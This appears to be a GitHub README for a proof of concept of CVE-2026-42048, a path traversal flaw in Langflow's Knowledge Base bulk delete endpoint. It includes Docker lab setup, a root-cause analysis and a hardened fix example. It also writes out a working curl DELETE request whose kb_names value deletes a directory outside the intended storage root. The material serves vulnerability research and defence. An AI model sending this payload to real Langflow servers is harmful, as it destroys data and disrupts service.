EQSTLab/CVE-2026-42048
GitHub: EQSTLab/CVE-2026-42048
# CVE-2026-42048
**CVE-2026-42048 Langflow Path Traversal / Arbitrary Directory Deletion PoC**
https://github.com/user-attachments/assets/6e5481ff-e953-47a5-8870-70b30c6550de
## Description

CVE-2026-42048 : Langflow Arbitrary Directory Deletion Vulnerability

A path traversal vulnerability in Langflow before `1.9.0` allows an authenticated attacker to delete directories outside the intended Knowledge Base storage path through the bulk delete endpoint, `DELETE /api/v1/knowledge_bases`. The issue occurs because user-controlled `kb_names` values are used to construct filesystem paths without proper normalization and containment validation.
## Preconditions

Successful exploitation requires the following conditions:

- The target is running a vulnerable Langflow version, before `1.9.0`.
- The attacker can reach the Knowledge Bases bulk delete endpoint: `DELETE /api/v1/knowledge_bases`
- The attacker is authenticated or can otherwise make authenticated API requests. Public advisories describe this issue as requiring low privileges (`PR:L`).
- The attacker can control the `kb_names` request body parameter.
- The Langflow process has filesystem permission to delete the target directory.

This vulnerability does not bypass operating system file permissions. It abuses Langflow's own path handling and deletion logic.
## Lab Setup

Build and run the vulnerable environment using Docker:

### Build Image

```bash
docker build -t cve-2026-42048 .
```

### Run Container

```bash
docker run --rm -d -p 9101:9101 --name cve-2026-42048 cve-2026-42048
```

### Check Status

```bash
curl http://127.0.0.1:9101/status
```

The lab creates a disposable target directory at:

```
/target/CVE-2026-42048
```

The `/status` endpoint reports whether that directory still exists.
## How to use

### Exploit with PoC

```bash
python3 poc.py
```

Interactive input:

```
Vulnerable URL: http://127.0.0.1:9101
Path to delete [/target/CVE-2026-42048]:
```

### Exploit with curl

```bash
curl -s -X DELETE http://127.0.0.1:9101/api/v1/knowledge_bases \
  -H "Content-Type: application/json" \
  -d '{"kb_names":["/target/CVE-2026-42048"]}'
```

### Verify Result

```bash
curl http://127.0.0.1:9101/status
```

If exploitation succeeds, `target_exists` changes from `true` to `false`.
## Analysis

**Vulnerable Endpoint**

```
DELETE /api/v1/knowledge_bases
```

The vulnerability exists in Langflow's Knowledge Bases bulk delete API. The affected handler accepts a list of Knowledge Base names through the `kb_names` parameter and uses each value to build a filesystem path for deletion.

In vulnerable versions, the bulk delete logic manually constructs the path instead of using the safer path resolution helper used by other Knowledge Base endpoints. A simplified representation of the vulnerable pattern is:

```python
kb_root_path = KBStorageHelper.get_root_path()
kb_user_path = kb_root_path / current_user.username

for kb_name in request.kb_names:
    kb_path = kb_user_path / kb_name
    if not kb_path.exists() or not kb_path.is_dir():
        continue
    KBStorageHelper.delete_storage(kb_path, kb_name)
```

The delete helper eventually removes the target directory with recursive deletion logic.

Because `kb_name` is attacker-controlled, path traversal sequences such as `../` can escape the current user's Knowledge Base directory. In Python's `pathlib`, an absolute path supplied on the right-hand side of `/` also discards the previous path components:

```python
Path("/safe/base") / "/target/CVE-2026-42048"  # -> /target/CVE-2026-42048
```

As a result, a crafted `kb_names` value can cause Langflow to delete a directory outside the intended Knowledge Base storage root, as long as the Langflow process has permission to remove that directory.

This is a **CWE-22: Improper Limitation of a Pathname to a Restricted Directory** issue.

### Technical Root Cause

The root cause is insufficient normalization and boundary validation of user-controlled path components before recursive deletion. The vulnerable bulk delete endpoint checks whether the final path exists, but it does not ensure that the resolved path remains under the authenticated user's Knowledge Base directory.
A robust fix must:

- normalize the final path with `Path.resolve()`
- ensure the resolved path is still inside the authenticated user's Knowledge Base directory
- reject paths that escape that directory before deletion

Langflow fixed this issue in `1.9.0`.

### Why This Matters

Arbitrary directory deletion can directly impact integrity and availability. Depending on deployment permissions and filesystem layout, an attacker may be able to:

- delete another user's Knowledge Base data
- remove application-owned directories
- disrupt Langflow runtime state
- cause data loss or service interruption

This issue does not require arbitrary code execution to be harmful. Recursive deletion with application privileges is enough to damage data and availability.
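The following is an added example, not Langflow's code and not part of this repository's PoC. It shows the containment check described above applied to the bulk-delete loop from the Analysis section: every `kb_name` is resolved with `Path.resolve()` and must stay strictly inside the user's Knowledge Base directory, which rejects both `../` traversal and the `pathlib` absolute-path override. The helper names (`resolve_kb_path`, `bulk_delete`, `demo`) and the temporary directory layout are assumptions constructed for the demonstration.

```python
"""Containment check for user-supplied Knowledge Base names (added example)."""
import shutil
import tempfile
from pathlib import Path


def pathlib_absolute_override() -> str:
    # pathlib drops the left operand when the right operand is absolute,
    # which is why an absolute kb_name escapes the base directory entirely.
    return str(Path("/safe/base") / "/target/CVE-2026-42048")


def resolve_kb_path(kb_user_path: Path, kb_name: str):
    """Return the resolved path for kb_name only if it stays strictly inside
    kb_user_path; otherwise return None. Hypothetical helper, not Langflow's."""
    base = kb_user_path.resolve()
    candidate = (base / kb_name).resolve()   # normalizes '..' and follows symlinks
    if candidate == base:                    # '', '.' or 'x/..' would target the user dir itself
        return None
    if not candidate.is_relative_to(base):   # escaped via '..' or an absolute component
        return None
    return candidate


def bulk_delete(kb_user_path: Path, kb_names):
    """Hardened form of the bulk-delete loop: validate containment, then delete."""
    deleted, rejected = [], []
    for kb_name in kb_names:
        kb_path = resolve_kb_path(kb_user_path, kb_name)
        if kb_path is None or not kb_path.is_dir():
            rejected.append(kb_name)
            continue
        shutil.rmtree(kb_path)               # recursive deletion only after the check passes
        deleted.append(kb_name)
    return deleted, rejected


def demo():
    """Build a throwaway layout (constructed sample data) and run bulk_delete
    with one legitimate name, one '..' traversal and one absolute path."""
    root = Path(tempfile.mkdtemp())
    kb_user_path = root / "kb" / "alice"
    (kb_user_path / "notes").mkdir(parents=True)
    victim = root / "victim"                 # directory outside the user's KB storage
    victim.mkdir()
    names = ["notes", "../../victim", str(victim)]
    deleted, rejected = bulk_delete(kb_user_path, names)
    result = {
        "deleted": deleted,
        "rejected": rejected,
        "victim_exists": victim.exists(),
        "notes_exists": (kb_user_path / "notes").exists(),
    }
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(pathlib_absolute_override())
    print(demo())
```

Because `resolve()` follows symlinks, a Knowledge Base directory that is itself a symlink pointing outside the user's storage is rejected as well, which is the behaviour you want before a recursive delete. The `candidate == base` check prevents an empty or `.` name from deleting the user's whole Knowledge Base directory.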
## Scenario

```
+-------------------------------------------+
| Authenticated User                        |
+-------------------------------------------+
                 |
                 | DELETE /api/v1/knowledge_bases
                 | kb_names = ["/target/CVE-2026-42048"]
                 v
+-------------------------------------------+
| Langflow Knowledge Base API               |
+-------------------------------------------+
                 |
                 | Unsafe path construction
                 v
+-------------------------------------------+
| Path Escapes Intended KB User Directory   |
+-------------------------------------------+
                 |
                 | Recursive directory deletion
                 v
+-------------------------------------------+
| Arbitrary Directory Deletion              |
+-------------------------------------------+
```
## Lab Notes

This lab exposes a small challenge proxy on port `9101`. The proxy keeps the full Langflow UI and direct backend port hidden, while forwarding only the minimal vulnerable API path required for this exercise.

The target directory for the lab is:

```
/target/CVE-2026-42048
```

The `/status` endpoint can be used to confirm that the target directory has been deleted.
## Cleanup

```bash
docker stop cve-2026-42048
```
## Disclaimer

This repository is not intended to facilitate unauthorized exploitation of Langflow instances. The purpose of this project is to help security researchers, defenders, and developers understand the vulnerability, validate exposure in controlled environments, and apply effective mitigations.
## References

- https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q
- https://nvd.nist.gov/vuln/detail/CVE-2026-42048
- https://github.com/langflow-ai/langflow